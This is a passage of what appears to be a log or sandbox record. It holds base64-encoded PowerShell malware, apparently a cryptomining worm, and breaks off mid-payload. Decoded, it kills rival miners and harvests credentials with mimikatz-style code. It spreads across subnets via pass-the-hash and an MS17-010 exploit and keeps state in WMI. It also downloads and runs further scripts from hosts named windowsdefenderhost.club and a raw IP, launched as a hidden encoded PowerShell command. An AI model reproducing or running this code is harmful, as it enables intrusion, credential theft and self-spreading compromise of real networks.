QAKACAAIAAgACAAIAAgACAAIAAgACAAIAAgACQAZQB4AGkAcwB0AD0AJAB0AHIAdQBlAA0ACgAgACAAIAAgACAAIAAgACAAIAAgACAAIABiAHIAZQBhAGsADQAKACAAIAAgACAAIAAgACAAIAB9AA0ACgAgACAAIAAgAH0ADQAKAH0ADQAKAEsAaQBsAGwAQgBvAHQAKAAnAGMAbwByAGUAZABwAHUAcwBzAHYAcgAnACkADQAKAGYAbwByAGUAYQBjAGgAIAAoACQAdAAgAGkAbgAgACQAdABjAHAAYwBvAG4AbgApAA0ACgAgACAAIAAgAHsADQAKACAAIAAgACAAIAAgACAAIAAkAGwAaQBuAGUAIAA9ACQAdAAuAHMAcABsAGkAdAAoACcAIAAnACkAfAAgAD8AewAkAF8AfQANAAoAIAAgACAAIAAgACAAIAAgAGkAZgAgACgAIQAoACQAbABpAG4AZQAgAC0AaQBzACAAWwBhAHIAcgBhAHkAXQApACkAewBjAG8AbgB0AGkAbgB1AGUAfQANAAoAIAAgACAAIAAgACAAIAAgAGkAZgAgACgAKAAkAGwAaQBuAGUAWwAtADMAXQAgAC0AbgBlACAAJABuAHUAbABsACkAIAAtAGEAbgBkACAAJAB0AC4AYwBvAG4AdABhAGkAbgBzACgAIgBFAFMAVABBAEIATABJAFMASABFAEQAIgApACAALQBhAG4AZAAgACgAJABsAGkAbgBlAFsALQAzAF0ALgBjAG8AbgB0AGEAaQBuAHMAKAAiADoAMQAxADEAMQAiACkAIAAtAG8AcgAgACQAbABpAG4AZQBbAC0AMwBdAC4AYwBvAG4AdABhAGkAbgBzACgAIgA6ADIAMgAyADIAIgApACAALQBvAHIAIAAkAGwAaQBuAGUAWwAtADMAXQAuAGMAbwBuAHQAYQBpAG4AcwAoACIAOgAzADMAMwAzACIAKQAgAC0AbwByACAAJABsAGkAbgBlAFsALQAzAF0ALgBjAG8AbgB0AGEAaQBuAHMAKAAiADoANAA0ADQANAAiACkAIAAtAG8AcgAgACQAbABpAG4AZQBbAC0AMwBdAC4AYwBvAG4AdABhAGkAbgBzACgAIgA6ADUANQA1ADUAIgApACAALQBvAHIAIAAkAGwAaQBuAGUAWwAtADMAXQAuAGMAbwBuAHQAYQBpAG4AcwAoACIAOgA2ADYANgA2ACIAKQAgAC0AbwByACAAJABsAGkAbgBlAFsALQAzAF0ALgBjAG8AbgB0AGEAaQBuAHMAKAAiADoANwA3ADcANwAiACkAIAAtAG8AcgAgACQAbABpAG4AZQBbAC0AMwBdAC4AYwBvAG4AdABhAGkAbgBzACgAIgA6ADgAOAA4ADgAIgApACAALQBvAHIAIAAkAGwAaQBuAGUAWwAtADMAXQAuAGMAbwBuAHQAYQBpAG4AcwAoACIAOgA5ADkAOQA5ACIAKQAgAC0AbwByACAAJABsAGkAbgBlAFsALQAzAF0ALgBjAG8AbgB0AGEAaQBuAHMAKAAiADoAMQA0ADQAMwAzACIAKQAgAC0AbwByACAAJABsAGkAbgBlAFsALQAzAF0ALgBjAG8AbgB0AGEAaQBuAHMAKAAiADoANAA1ADUANgAwACIAKQAgAC0AbwByACAAJABsAGkAbgBlAFsALQAzAF0ALgBjAG8AbgB0AGEAaQBuAHMAKAAiADoANgA1ADMAMwAzACIAKQAgAC0AbwByACAAJABsAGkAbgBlAFsALQAzAF0ALgBjAG8AbgB0AGEAaQBuAHMAKAAiADoANQA1ADMAMwA1ACIAKQApACkADQAKACAAIAAgACAAIAAgACAAIAB7AA0ACgAgACAAIAAgACAAIAAgACAAIAAgACAAIAAkAGUAdgBpAGQAPQAkAGwAaQBuAGUAWwAtADEAXQANAAoAIAAgACAAIAAgACAAIAAgACAAIAAgACAARwBlAHQALQBQAHIAbwBjAGUAcwBzACAALQBpAGQAIAAkAGUAdgBpAGQAIAB8ACAAcwB0AG8AcAAtAHAAcgBvAGMAZQBzAHMAIAAtAGYAbwByAGMAZQANAAoAIAAgACAAIAAgACAAIAAgAH0ADQAKACAAIAAgACAAfQANAAoAaQBmACAAKAAhACQAZQB4AGkAcwB0ACAALQBhAG4AZAAgACgAJABwAHMAaQBkAHMALgBjAG8AdQBuAHQAIAAtAGwAZQAgADgAKQApAA0ACgB7ACAAIAAgAA0ACgAgACAAIAAgACQAYwBtAGQAbQBvAG4APQAiAHAAbwB3AGUAcgBzAGgAZQBsAGwAIAAtAE4AbwBQACAALQBOAG8AbgBJACAALQBXACAASABpAGQAZABlAG4AIABgACIAYAAkAG0AbwBuACAAPQAgACgAWwBXAG0AaQBDAGwAYQBzAHMAXQAgACcAcgBvAG8AdABcAGQAZQBmAGEAdQBsAHQAOgBjAG8AcgBlAGQAcAB1AHMAcwB2AHIAJwApAC4AUAByAG8AcABlAHIAdABpAGUAcwBbACcAbQBvAG4AJwBdAC4AVgBhAGwAdQBlADsAYAAkAGYAdQBuAHMAIAA9ACAAKABbAFcAbQBpAEMAbABhAHMAcwBdACAAJwByAG8AbwB0AFwAZABlAGYAYQB1AGwAdAA6AGMAbwByAGUAZABwAHUAcwBzAHYAcgAnACkALgBQAHIAbwBwAGUAcgB0AGkAZQBzAFsAJwBmAHUAbgBzACcAXQAuAFYAYQBsAHUAZQAgADsAaQBlAHgAIAAoAFsAUwB5AHMAdABlAG0ALgBUAGUAeAB0AC4ARQBuAGMAbwBkAGkAbgBnAF0AOgA6AEEAUwBDAEkASQAuAEcAZQB0AFMAdAByAGkAbgBnACgAWwBTAHkAcwB0AGUAbQAuAEMAbwBuAHYAZQByAHQAXQA6ADoARgByAG8AbQBCAGEAcwBlADYANABTAHQAcgBpAG4AZwAoAGAAJABmAHUAbgBzACkAKQApADsASQBuAHYAbwBrAGUALQBDAG8AbQBtAGEAbgBkACAAIAAtAFMAYwByAGkAcAB0AEIAbABvAGMAawAgAGAAJABSAGUAbQBvAHQAZQBTAGMAcgBpAHAAdABCAGwAbwBjAGsAIAAtAEEAcgBnAHUAbQBlAG4AdABMAGkAcwB0ACAAQAAoAGAAJABtAG8AbgAsACAAYAAkAG0AbwBuACwAIAAnAFYAbwBpAGQAJwAsACAAMAAsACAAJwAnACwAIAAnACcAKQBgACIAIgANAAoAIAAgACAAIAAkAHYAYgBzACAAPQAgAE4AZQB3AC0ATwBiAGoAZQBjAHQAIAAtAEMAbwBtAE8AYgBqAGUAYwB0ACAAVwBTAGMAcgBpAHAAdAAuAFMAaABlAGwAbAANAAoACQAkAHYAYgBzAC4AcgB1AG4AKAAkAGMAbQBkAG0AbwBuACwAMAApACAAIAANAAoAfQANAAoADQAKACQATgBUAEwATQA9ACQARgBhAGwAcwBlAA0ACgAkAG0AaQBtAGkAIAA9ACAAKABbAFcAbQBpAEMAbABhAHMAcwBdACAAJwByAG8AbwB0AFwAZABlAGYAYQB1AGwAdAA6AGMAbwByAGUAZABwAHUAcwBzAHYAcgAnACkALgBQAHIAbwBwAGUAcgB0AGkAZQBzAFsAJwBtAGkAbQBpACcAXQAuAFYAYQBsAHUAZQAgAA0ACgAkAGEALAAgACQATgBUAEwATQA9ACAARwBlAHQALQBjAHIAZQBkAHMAIAAkAG0AaQBtAGkAIAAkAG0AaQBtAGkADQAKACAAIAAgACAAIAAgACAADQAKACQATgBlAHQAdwBvAHIAawBzACAAPQAgAEcAZQB0AC0AVwBtAGkATwBiAGoAZQBjAHQAIABXAGkAbgAzADIAXwBOAGUAdAB3AG8AcgBrAEEAZABhAHAAdABlAHIAQwBvAG4AZgBpAGcAdQByAGEAdABpAG8AbgAgAC0ARQBBACAAUwB0AG8AcAAgAHwAIAA/ACAAewAkAF8ALgBJAFAARQBuAGEAYgBsAGUAZAB9ACAAIAAgACAADQAKACQAaQBwAHMAdQAgAD0AIAAoAFsAVwBtAGkAQwBsAGEAcwBzAF0AIAAnAHIAbwBvAHQAXABkAGUAZgBhAHUAbAB0ADoAYwBvAHIAZQBkAHAAdQBzAHMAdgByACcAKQAuAFAAcgBvAHAAZQByAHQAaQBlAHMAWwAnAGkAcABzAHUAJwBdAC4AVgBhAGwAdQBlACAADQAKACQAaQAxADcAIAA9ACAAKABbAFcAbQBpAEMAbABhAHMAcwBdACAAJwByAG8AbwB0AFwAZABlAGYAYQB1AGwAdAA6AGMAbwByAGUAZABwAHUAcwBzAHYAcgAnACkALgBQAHIAbwBwAGUAcgB0AGkAZQBzAFsAJwBpADEANwAnAF0ALgBWAGEAbAB1AGUADQAKACQAcwBjAGIAYQA9ACAAKABbAFcAbQBpAEMAbABhAHMAcwBdACAAJwByAG8AbwB0AFwAZABlAGYAYQB1AGwAdAA6AGMAbwByAGUAZABwAHUAcwBzAHYAcgAnACkALgBQAHIAbwBwAGUAcgB0AGkAZQBzAFsAJwBzAGMAJwBdAC4AVgBhAGwAdQBlAA0ACgBbAGIAeQB0AGUAWwBdAF0AJABzAGMAPQBbAFMAeQBzAHQAZQBtAC4AQwBvAG4AdgBlAHIAdABdADoAOgBGAHIAbwBtAEIAYQBzAGUANgA0AFMAdAByAGkAbgBnACgAJABzAGMAYgBhACkAIAAgACAAIAAgAA0ACgBmAG8AcgBlAGEAYwBoACAAKAAkAE4AZQB0AHcAbwByAGsAIABpAG4AIAAkAE4AZQB0AHcAbwByAGsAcwApACAADQAKAHsAIAAgACAAIAAgACAAIAAgACAAIAAgACAADQAKACAAIAAgACAADQAKACAAIAAgACAAJABJAFAAQQBkAGQAcgBlAHMAcwAgACAAPQAgACQATgBlAHQAdwBvAHIAawAuAEkAcABBAGQAZAByAGUAcwBzAFsAMABdACAAIAANAAoACQBpAGYAIAAoACQASQBQAEEAZABkAHIAZQBzAHMAIAAtAG0AYQB0AGMAaAAgACcAXgAxADYAOQAuADIANQA0ACcAKQB7AGMAbwBuAHQAaQBuAHUAZQB9ACAACQANAAoAIAAgACAAIAAkAFMAdQBiAG4AZQB0AE0AYQBzAGsAIAAgAD0AIAAkAE4AZQB0AHcAbwByAGsALgBJAFAAUwB1AGIAbgBlAHQAWwAwAF0AIAAgAA0ACgAgACAAIAAgACQAaQBwAHMAPQBHAGUAdAAtAE4AZQB0AHcAbwByAGsAUgBhAG4AZwBlACAAJABJAFAAQQBkAGQAcgBlAHMAcwAgACQAUwB1AGIAbgBlAHQATQBhAHMAawANAAoACQAkAHQAYwBwAGMAbwBuAG4AIAA9ACAAbgBlAHQAcwB0AGEAdAAgAC0AYQBuAG8AcAAgAHQAYwBwACAADQAKAAkAZgBvAHIAZQBhAGMAaAAgACgAJAB0ACAAaQBuACAAJAB0AGMAcABjAG8AbgBuACkADQAKACAAIAAgACAAewANAAoAIAAgACAAIAAgACAAIAAgACQAbABpAG4AZQAgAD0AJAB0AC4AcwBwAGwAaQB0ACgAJwAgACcAKQB8ACAAPwB7ACQAXwB9AA0ACgAgACAAIAAgACAAIAAgACAAaQBmACAAKAAhACgAJABsAGkAbgBlACAALQBpAHMAIABbAGEAcgByAGEAeQBdACkAKQB7AGMAbwBuAHQAaQBuAHUAZQB9AA0ACgAJAAkAaQBmACAAKAAkAGwAaQBuAGUALgBjAG8AdQBuAHQAIAAtAGwAZQAgADQAKQB7AGMAbwBuAHQAaQBuAHUAZQB9AA0ACgAJAAkAJABpAD0AJABsAGkAbgBlAFsALQAzAF0ALgBzAHAAbABpAHQAKAAnADoAJwApAFsAMABdAA0ACgAgACAAIAAgACAAIAAgACAAaQBmACAAKAAgACgAJABsAGkAbgBlAFsALQAyAF0AIAAtAGUAcQAgACcARQBTAFQAQQBCAEwASQBTAEgARQBEACcAKQAgAC0AYQBuAGQAIAAgACgAJABpACAALQBuAGUAIAAnADEAMgA3AC4AMAAuADAALgAxACcAKQAgAC0AYQBuAGQAIAAoACQAaQBwAHMAIAAtAG4AbwB0AGMAbwBuAHQAYQBpAG4AcwAgACQAaQApACkADQAKACAAIAAgACAAIAAgACAAIAB7AA0ACgAgACAAIAAgACAAIAAgACAAIAAgACAAIAAkAGkAcABzACsAPQAkAGkADQAKACAAIAAgACAAIAAgACAAIAB9AA0ACgAgACAAIAAgAH0ADQAKACAAIAAgACAAaQBmACAAKAAoAFsARQBuAHYAaQByAG8AbgBtAGUAbgB0AF0AOgA6AFQAaQBjAGsAQwBvAHUAbgB0AC0AJABzAHQAaQBtAGUAKQAvADEAMAAwADAAIAAtAGcAdAAgADUANAAwADAAKQB7AGIAcgBlAGEAawB9AA0ACgAgACAAIAAgAGYAbwByAGUAYQBjAGgAIAAoACQAaQBwACAAaQBuACAAJABpAHAAcwApAA0ACgAgACAAIAAgAHsAIAAgACAADQAKACAAIAAgACAAIAAgACAAIABpAGYAIAAoACgAWwBFAG4AdgBpAHIAbwBuAG0AZQBuAHQAXQA6ADoAVABpAGMAawBDAG8AdQBuAHQALQAkAHMAdABpAG0AZQApAC8AMQAwADAAMAAgAC0AZwB0ACAANQA0ADAAMAApAHsAYgByAGUAYQBrAH0ADQAKACAAIAAgACAAIAAgACAAIABpAGYAIAAoACQAaQBwACAALQBlAHEAIAAkAEkAUABBAGQAZAByAGUAcwBzACkAewBjAG8AbgB0AGkAbgB1AGUAfQAgACAAIAAgACAADQAKACAAIAAgACAAIAAgACAAIABpAGYAIAAoACgAVABlAHMAdAAtAEMAbwBuAG4AZQBjAHQAaQBvAG4AIAAkAGkAcAAgAC0AYwBvAHUAbgB0ACAAMQApACAALQBuAGUAIAAkAG4AdQBsAGwAIAAgAC0AYQBuAGQAIAAkAGkAcABzAHUAIAAtAG4AbwB0AGMAbwBuAHQAYQBpAG4AcwAgACQAaQBwACkAIAANAAoAIAAgACAAIAAgACAAIAAgAHsAIAAgACAADQAKACAAIAAgACAAIAAgACAAIAAgACAAIAAgACQAcgBlAD0AMAANAAoAIAAgACAAIAAgACAAIAAgACAAIAAgACAAaQBmACAAKAAkAGEALgBjAG8AdQBuAHQAIAAtAG4AZQAgADAAKQAgACAAIAAgACAAIAANAAoAIAAgACAAIAAgACAAIAAgACAAIAAgACAAewAkAHIAZQAgAD0AIAB0AGUAcwB0AC0AaQBwACAALQBpAHAAIAAkAGkAcAAgAC0AYwByAGUAZABzACAAJABhACAAIAAtAG4AaQBjACAAJABuAGkAYwAgAC0AbgB0AGwAbQAgACQATgBUAEwATQAgAH0ADQAKACAAIAAgACAAIAAgACAAIAAgACAAIAAgAGkAZgAgACgAJAByAGUAIAAtAGUAcQAgADEAKQB7ACQAaQBwAHMAdQAgAD0AJABpAHAAcwB1ACAAKwAiACAAIgArACQAaQBwAH0ADQAKAAkACQAJAGUAbABzAGUADQAKAAkACQAJAHsADQAKAAkACQAJAAkAJAB2AHUAbAA9AFsAUABpAG4AZwBDAGEAcwB0AGwAZQAuAFMAYwBhAG4AbgBlAHIAcwAuAG0AMQA3AHMAYwBdADoAOgBTAGMAYQBuACgAJABpAHAAKQAJAAkACQAJAA0ACgAJAAkACQAJAGkAZgAgACgAJAB2AHUAbAAgAC0AYQBuAGQAIAAkAGkAMQA3ACAALQBuAG8AdABjAG8AbgB0AGEAaQBuAHMAIAAkAGkAcAApAA0ACgANAAoACQAJAAkACQB7AA0ACgAJAAkACQAJAAkAJAByAGUAcwA9AGUAYgA3ACAAJABpAHAAIAAkAHMAYwANAAoACQAJAAkACQAJAGkAZgAgACgAIQAoACQAcgBlAHMAIAAtAGUAcQAgACQAdAByAHUAZQApACkADQAKAAkACQAJAAkACQB7AGUAYgA4ACAAJABpAHAAIAAkAHMAYwB9AA0ACgAJAAkACQAJAAkAJABpADEANwAgAD0AIAAkAGkAMQA3ACAAKwAgACIAIAAiACsAJABpAHAADQAKAAkACQAJAAkAfQANAAoACQAJAAkAfQANAAoAIAAgACAAIAAgACAAIAAgAH0ADQAKACAAIAAgACAAfQANAAoAIAB9ACAAIAAgACAAIAAgACAADQAKACQAUwB0AGEAdABpAGMAQwBsAGEAcwBzAD0ATgBlAHcALQBPAGIAagBlAGMAdAAgAE0AYQBuAGEAZwBlAG0AZQBuAHQALgBNAGEAbgBhAGcAZQBtAGUAbgB0AEMAbABhAHMAcwAoACcAcgBvAG8AdABcAGQAZQBmAGEAdQBsAHQAOgBjAG8AcgBlAGQAcAB1AHMAcwB2AHIAJwApACAAIAANAAoAJABTAHQAYQB0AGkAYwBDAGwAYQBzAHMALgBTAGUAdABQAHIAbwBwAGUAcgB0AHkAVgBhAGwAdQBlACgAJwBpAHAAcwB1ACcAIAAsACQAaQBwAHMAdQApAA0ACgAkAFMAdABhAHQAaQBjAEMAbABhAHMAcwAuAFAAdQB0ACgAKQANAAoAJABTAHQAYQB0AGkAYwBDAGwAYQBzAHMALgBTAGUAdABQAHIAbwBwAGUAcgB0AHkAVgBhAGwAdQBlACgAJwBpADEANwAnACAALAAkAGkAMQA3ACkADQAKACQAUwB0AGEAdABpAGMAQwBsAGEAcwBzAC4AUAB1AHQAKAApAA==\"],\"cmd_line\":\"powershell.exe -NoP -NonI -W Hidden -E JABzAGUAPQBAACgAJwB1AHAAZABhAHQAZQAuAHcAaQBuAGQAbwB3AHMAZABlAGYAZQBuAGQAZQByAGgAbwBzAHQALgBjAGwAdQBiACcALAAnAGkAbgBmAG8ALgB3AGkAbgBkAG8AdwBzAGQAZQBmAGUAbgBkAGUAcgBoAG8AcwB0AC4AYwBsAHUAYgAnACwAJwA4ADcALgAxADIAMQAuADkAOAAuADIAMQA1ACcAKQANAAoAJABuAGkAYwA9ACcAdwB3AHcALgB3AGkAbgBkAG8AdwBzAGQAZQBmAGUAbgBkAGUAcgBoAG8AcwB0AC4AYwBsAHUAYgAnAA0ACgBmAG8AcgBlAGEAYwBoACgAJAB0ACAAaQBuACAAJABzAGUAKQANAAoAewANAAoAIAAgACAAIAAkAHAAaQBuAD0AdABlAHMAdAAtAGMAbwBuAG4AZQBjAHQAaQBvAG4AIAAkAHQADQAKACAAIAAgACAAaQBmACAAKAAkAHAAaQBuACAALQBuAGUAIAAkAG4AdQBsAGwAKQANAAoAIAAgACAAIAB7AA0ACgAgACAAIAAgACAAIAAgACAAJABuAGkAYwA9ACQAdAANAAoAIAAgACAAIAAgACAAIAAgAGIAcgBlAGEAawANAAoAIAAgACAAIAB9AA0ACgB9AA0ACgAkAG4AaQBjAD0AJABuAGkAYwArACIAOgA4ADAAMAAwACIADQAKACQAdgBlAHIAPQAoAE4AZQB3AC0ATwBiAGoAZQBjAHQAIABOAGUAdAAuAFcAZQBiAEMAbABpAGUAbgB0ACkALgBEAG8AdwBuAGwAbwBhAGQAUwB0AHIAaQBuAGcAKAAiAGgAdAB0AHAAOgAvAC8AJABuAGkAYwAvAHYAZQByAC4AdAB4AHQAIgApAC4AVAByAGkAbQAoACkAIAANAAoAaQBmACgAJAB2AGUAcgAgAC0AbgBlACAAJABuAHUAbABsACkAewAgAA0ACgAgACAAIAAgAGkAZgAoACQAdgBlAHIAIAAtAG4AZQAgACgAWwBXAG0AaQBDAGwAYQBzAHMAXQAgACcAcgBvAG8AdABcAGQAZQBmAGEAdQBsAHQAOgBjAG8AcgBlAGQAcAB1AHMAcwB2AHIAJwApAC4AUAByAG8AcABlAHIAdABpAGUAcwBbACcAdgBlAHIAJwBdAC4AVgBhAGwAdQBlACkAewAgAA0ACgAgACAAIAAgACAAIAAgACAASQBFAFgAIAAoAE4AZQB3AC0ATwBiAGoAZQBjAHQAIABOAGUAdAAuAFcAZQBiAEMAbABpAGUAbgB0ACkALgBEAG8AdwBuAGwAbwBhAGQAUwB0AHIAaQBuAGcAKAAiAGgAdAB0AHAAOgAvAC8AJABuAGkAYwAvAGkAbgBmAG8ANgAuAHAAcwAxACIAKQANAAoAIAAgACAAIAAgACAAIAAgAHIAZQB0AHUAcgBuACAADQAKACAAIAAgACAAfQAgAA0ACgB9AA0ACgAkAHMAdABpAG0AZQA9AFsARQBuAHYAaQByAG8AbgBtAGUAbgB0AF0AOgA6AFQAaQBjAGsAQwBvAHUAbgB0AA0ACgAkAGYAdQBuAHMAIAA9ACAAKABbAFcAbQBpAEMAbABhAHMAcwBdACAAJwByAG8AbwB0AFwAZABlAGYAYQB1AGwAdAA6AGMAbwByAGUAZABwAHUAcwBzAHYAcgAnACkALgBQAHIAbwBwAGUAcgB0AGkAZQBzAFsAJwBmAHUAbgBzACcAXQAuAFYAYQBsAHUAZQAgACAAIAAgACAAIAAgACAADQAKACQAZABlAGYAdQBuAD0AWwBTAHkAcwB0AGUAbQAuAFQAZQB4AHQALgBFAG4AYwBvAGQAaQBuAGcAXQA6ADoAQQBTAEMASQBJAC4ARwBlAHQAUwB0AHIAaQBuAGcAKABbAFMAeQBzAHQAZQBtAC4AQwBvAG4AdgBlAHIAdABdADoAOgBGAHIAbwBtAEIAYQBzAGUANgA0AFMAdAByAGkAbgBnACgAJABmAHUAbgBzACkAKQANAAoAaQBlAHgAIAAkAGQAZQBmAHUAbgANAAoADQAKAEcAZQB0AC0AVwBtAGkATwBiAGoAZQBjAHQAIABfAF8ARgBpAGwAdABlAHIAVABvAEMAbwBuAHMAdQBtAGUAcgBCAGkAbgBkAGkAbgBnACAALQBOAGEAbQBlAHMAcABhAGMAZQAgAHIAbwBvAHQAXABzAHUAYgBzAGMAcgBpAHAAdABpAG8AbgAgAHwAIABXAGgAZQByAGUALQBPAGIAagBlAGMAdAAgAHsAJABfAC4AZgBpAGwAdABlAHIAIAAtAG4AbwB0AG0AYQB0AGMAaAAgACcAUwB5AHMAdABlAG0AIABFAHYAZQBuAHQAcwAgAEwAbwBnACcAfQAgAHwAUgBlAG0AbwB2AGUALQBXAG0AaQBPAGIAagBlAGMAdAANAAoAJABkAGkAcgBwAGEAdABoAD0AJABlAG4AdgA6AFMAeQBzAHQAZQBtAFIAbwBvAHQAKwAnAFwAcwB5AHMAdABlAG0AMwAyACcAIAAgACAADQAKAGkAZgAgACAAKAAhACgAdABlAHMAdAAtAHAAYQB0AGgAIAAkAGQAaQByAHAAYQB0AGgAIAApACkAewANAAoACQAkAGQAaQByAHAAYQB0AGgAPQAkAGUAbgB2ADoAUwB5AHMAdABlAG0AUgBvAG8AdAANAAoAfQANAAoAaQBmACAAKAAhACgAdABlAHMAdAAtAHAAYQB0AGgAIAAoACQAZABpAHIAcABhAHQAaAArACcAXABtAHMAdgBjAHAAMQAyADAALgBkAGwAbAAnACkAKQApAA0ACgANAAoAewBzAGUAbgB0AGYAaQBsAGUAIAAoACQAZABpAHIAcABhAHQAaAArACcAXABtAHMAdgBjAHAAMQAyADAALgBkAGwAbAAnACkAIAAnAHYAYwBwACcAfQANAAoAaQBmACAAKAAhACgAdABlAHMAdAAtAHAAYQB0AGgAIAAoACQAZABpAHIAcABhAHQAaAArACcAXABtAHMAdgBjAHIAMQAyADAALgBkAGwAbAAnACkAKQApAA0ACgB7AHMAZQBuAHQAZgBpAGwAZQAgACgAJABkAGkAcgBwAGEAdABoACsAJwBcAG0AcwB2AGMAcgAxADIAMAAuAGQAbABsACcAKQAgACcAdgBjAHIAJwB9AA0ACgANAAoAWwBhAHIAcgBhAHkAXQAkAHAAcwBpAGQAcwA9ACAAZwBlAHQALQBwAHIAbwBjAGUAcwBzACAALQBuAGEAbQBlACAAcABvAHcAZQByAHMAaABlAGwAbAAgAHwAcwBvAHIAdAAgAGMAcAB1ACAALQBEAGUAcwBjAGUAbgBkAGkAbgBnAHwAIABGAG8AcgBFAGEAYwBoAC0ATwBiAGoAZQBjAHQAIAB7ACQAXwAuAGkAZAB9AA0ACgAkAHQAYwBwAGMAbwBuAG4AIAA9ACAAbgBlAHQAcwB0AGEAdAAgAC0AYQBuAG8AcAAgAHQAYwBwACAADQAKACQAZQB4AGkAcwB0AD0AJABGAGEAbABzAGUADQAKAGkAZgAgACgAJABwAHMAaQBkAHMAIAAtAG4AZQAgACQAbgB1AGwAbAAgACkADQAKAHsADQAKACAAIAAgACAAZgBvAHIAZQBhAGMAaAAgACgAJAB0ACAAaQBuACAAJAB0AGMAcABjAG8AbgBuACkADQAKACAAIAAgACAAewANAAoAIAAgACAAIAAgACAAIAAgACQAbABpAG4AZQAgAD0AJAB0AC4AcwBwAGwAaQB0ACgAJwAgACcAKQB8ACAAPwB7ACQAXwB9AA0ACgAgACAAIAAgACAAIAAgACAAaQBmACAAKAAkAGwAaQBuAGUAIAAtAGUAcQAgACQAbgB1AGwAbAApAA0ACgAgACAAIAAgACAAIAAgACAAewBjAG8AbgB0AGkAbgB1AGUAfQANAAoAIAAgACAAIAAgACAAIAAgAGkAZgAgACgAKAAkAHAAcwBpAGQAcwBbADAAXQAgAC0AZQBxACAAJABsAGkAbgBlAFsALQAxAF0AKQAgAC0AYQBuAGQAIAAkAHQALgBjAG8AbgB0AGEAaQBuAHMAKAAiAEUAUwBUAEEAQgBMAEkAUwBIAEUARAAiACkAIAAtAGEAbgBkACAAKAAkAHQALgBjAG8AbgB0AGEAaQBuAHMAKAAiADoAOAAwACAAIgApACAALQBvAHIAIAAkAHQALgBjAG8AbgB0AGEAaQBuAHMAKAAiADoAMQA0ADQANAA0ACIAKQApACAAKQANAAoAIAAgACAAIAAgACAAIAAgAHsADQAKACAAIAAgACAAIAAgACAAIAAgACAAIAAgACQAZQB4AGkAcwB0AD0AJAB0AHIAdQBlAA0ACgAgACAAIAAgACAAIAAgACAAIAAgACAAIABiAHIAZQBhAGsADQAKACAAIAAgACAAIAAgACAAIAB9AA0ACgAgACAAIAAgAH0ADQAKAH0ADQAKAEsAaQBsAGwAQgBvAHQAKAAnAGMAbwByAGUAZABwAHUAcwBzAHYAcgAnACkADQAKAGYAbwByAGUAYQBjAGgAIAAoACQAdAAgAGkAbgAgACQAdABjAHAAYwBvAG4AbgApAA0ACgAgACAAIAAgAHsADQAKACAAIAAgACAAIAAgACAAIAAkAGwAaQBuAGUAIAA9ACQAdAAuAHMAcABsAGkAdAAoACcAIAAnACkAfAAgAD8AewAkAF8AfQANAAoAIAAgACAAIAAgACAAIAAgAGkAZgAgACgAIQAoACQAbABpAG4AZQAgAC0AaQBzACAAWwBhAHIAcgBhAHkAXQApACkAewBjAG8AbgB0AGkAbgB1AGUAfQANAAoAIAAgACAAIAAgACAAIAAgAGkAZgAgACgAKAAkAGwAaQBuAGUAWwAtADMAXQAgAC0AbgBlACAAJABuAHUAbABsACkAIAAtAGEAbgBkACAAJAB0AC4AYwBvAG4AdABhAGkAbgBzACgAIgBFAFMAVABBAEIATABJAFMASABFAEQAIgApACAALQBhAG4AZAAgACgAJABsAGkAbgBlAFsALQAzAF0ALgBjAG8AbgB0AGEAaQBuAHMAKAAiADoAMQAxADEAMQAiACkAIAAtAG8AcgAgACQAbABpAG4AZQBbAC0AMwBdAC4AYwBvAG4AdABhAGkAbgBzACgAIgA6ADIAMgAyADIAIgApACAALQBvAHIAIAAkAGwAaQBuAGUAWwAtADMAXQAuAGMAbwBuAHQAYQBpAG4AcwAoACIAOgAzADMAMwAzACIAKQAgAC0AbwByACAAJABsAGkAbgBlAFsALQAzAF0ALgBjAG8AbgB0AGEAaQBuAHMAKAAiADoANAA0ADQANAAiACkAIAAtAG8AcgAgACQAbABpAG4AZQBbAC0AMwBdAC4AYwBvAG4AdABhAGkAbgBzACgAIgA6ADUANQA1ADUAIgApACAALQBvAHIAIAAkAGwAaQBuAGUAWwAtADMAXQAuAGMAbwBuAHQAYQBpAG4AcwAoACIAOgA2ADYANgA2ACIAKQAgAC0AbwByACAAJABsAGkAbgBlAFsALQAzAF0ALgBjAG8AbgB0AGEAaQBuAHMAKAAiADoANwA3ADcANwAiACkAIAAtAG8AcgAgACQAbABpAG4AZQBbAC0AMwBdAC4AYwBvAG4AdABhAGkAbgBzACgAIgA6ADgAOAA4ADgAIgApACAALQBvAHIAIAAkAGwAaQBuAGUAWwAtADMAXQAuAGMAbwBuAHQAYQBpAG4AcwAoACIAOgA5ADkAOQA5ACIAKQAgAC0AbwByACAAJABsAGkAbgBlAFsALQAzAF0ALgBjAG8AbgB0AGEAaQBuAHMAKAAiADoAMQA0ADQAMwAzACIAKQAgAC0AbwByACAAJABsAGkAbgBlAFsALQAzAF0ALgBjAG8AbgB0AGEAaQBuAHMAKAAiADoANAA1ADUANgAwACIAKQAgAC0AbwByACAAJABsAGkAbgBlAFsALQAzAF0ALgBjAG8AbgB0AGEAaQBuAHMAKAAiADoANgA1ADMAMwAzACIAKQAgAC0AbwByACAAJABsAGkAbgBlAFsALQAzAF0ALgBjAG8AbgB0AGEAaQBuAHMAKAAiADoANQA1ADMAMwA1ACIAKQApACkADQAKACAAIAAgACAAIAAgACAAIAB7AA0ACgAgACAAIAAgACAAIAAgACAAIAAgACAAIAAkAGUAdgBpAGQAPQAkAGwAaQBuAGUAWwAtADEAXQANAAoAIAAgACAAIAAgACAAIAAgACAAIAAgACAARwBlAHQALQBQAHIAbwBjAGUAcwBzACAALQBpAGQAIAAkAGUAdgBpAGQAIAB8ACAAcwB0AG8AcAAtAHAAcgBvAGMAZQBzAHMAIAAtAGYAbwByAGMAZQANAAoAIAAgACAAIAAgACAAIAAgAH0ADQAKACAAIAAgACAAfQANAAoAaQBmACAAKAAhACQAZQB4AGkAcwB0ACAALQBhAG4AZAAgACgAJABwAHMAaQBkAHMALgBjAG8AdQBuAHQAIAAtAGwAZQAgADgAKQApAA0ACgB7ACAAIAAgAA0ACgAgACAAIAAgACQAYwBtAGQAbQBvAG4APQAiAHAAbwB3AGUAcgBzAGgAZQBsAGwAIAAtAE4AbwBQACAALQBOAG8AbgBJACAALQBXACAASABpAGQAZABlAG4AIABgACIAYAAkAG0AbwBuACAAPQAgACgAWwBXAG0AaQBDAGwAYQBzAHMAXQAgACcAcgBvAG8AdABcAGQAZQBmAGEAdQBsAHQAOgBjAG8AcgBlAGQAcAB1AHMAcwB2AHIAJwApAC4AUAByAG8AcABlAHIAdABpAGUAcwBbACcAbQBvAG4AJwBdAC4AVgBhAGwAdQBlADsAYAAkAGYAdQBuAHMAIAA9ACAAKABbAFcAbQBpAEMAbABhAHMAcwBdACAAJwByAG8AbwB0AFwA